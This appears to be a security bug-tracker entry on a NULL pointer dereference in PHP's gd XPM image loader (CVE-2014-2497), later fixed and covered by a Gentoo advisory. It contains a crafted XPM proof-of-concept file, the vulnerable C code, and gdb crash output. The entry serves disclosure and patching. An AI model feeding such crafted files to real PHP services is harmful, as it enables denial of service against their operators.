From ${URL} : Description: ------------ php-gd <= v5.4.17-2 'c_color' NULL pointer dereference so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c: --------------------------------------------------------------------------------- gdImagePtr gdImageCreateFromXpm (char *filename) { XpmInfo info; XpmImage image; int i, j, k, number; char buf[5]; gdImagePtr im = 0; int *pointer; int red = 0, green = 0, blue = 0; int *colors; int ret; ret = XpmReadFileToXpmImage(filename, &image, &info); if (ret != XpmSuccess) { return 0; } if (!(im = gdImageCreate(image.width, image.height))) { goto done; } number = image.ncolors; colors = (int *) safe_emalloc(number, sizeof(int), 0); for (i = 0; i < number; i++) { switch (strlen (image.colorTable[i].c_color)) { // BOOM -------------------------------------------------------------------------------------------------------- The call to strlen() parses image.colorTable[i].c_color which is initialised as NULL if the particular color mapping uses a different key (such as monochrome/monovisual). The xpmColorKeys array stores all avaliable keys and can be found in libXpm: ---------------------------------------------------------------------------- const char *xpmColorKeys[] = { "s", /* key #1: symbol */ "m", /* key #2: mono visual */ "g4", /* key #3: 4 grays visual */ "g", /* key #4: gray visual */ "c", /* key #5: color visual */ }; The following xpm file will trigger the bug: -------------------------------------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", --------------------------------------------- POC: php > imagecreatefromxpm("monochome-poc.xpm"); (gdb) p colorTable[0] $2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"} (gdb) p colorTable[1] $3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"} (gdb) p colorTable[2] $4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"} (gdb) p colorTable[3] $5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0} (gdb) p colorTable[4] $6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"} (gdb) p colorTable[5] $7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"} (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 39 movdqu (%rdi), %xmm1 (gdb) bt #0 __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 #1 0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42 #2 0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534 #3 0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643 #4 0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410 #5 0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197 #6 0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664 #7 0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986 #8 0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364 Test script: --------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", Expected result: ---------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Resource id #4 php > Actual result: -------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Segmentation fault (core dumped) @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Is this bug part of the Fix in current PHP (or previous) being stabilized?
This is fixed in 5.5.16 and 5.4.32 currently in stabilization in bug 513032
CVE-2014-2497 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2497): The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26 and earlier, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted color table in an XPM file.
Stabilized and Cleaned up, adding to existing GLSA
This issue was resolved and addressed in GLSA 201408-11 at http://security.gentoo.org/glsa/glsa-201408-11.xml by GLSA coordinator Kristian Fiskerstrand (K_F).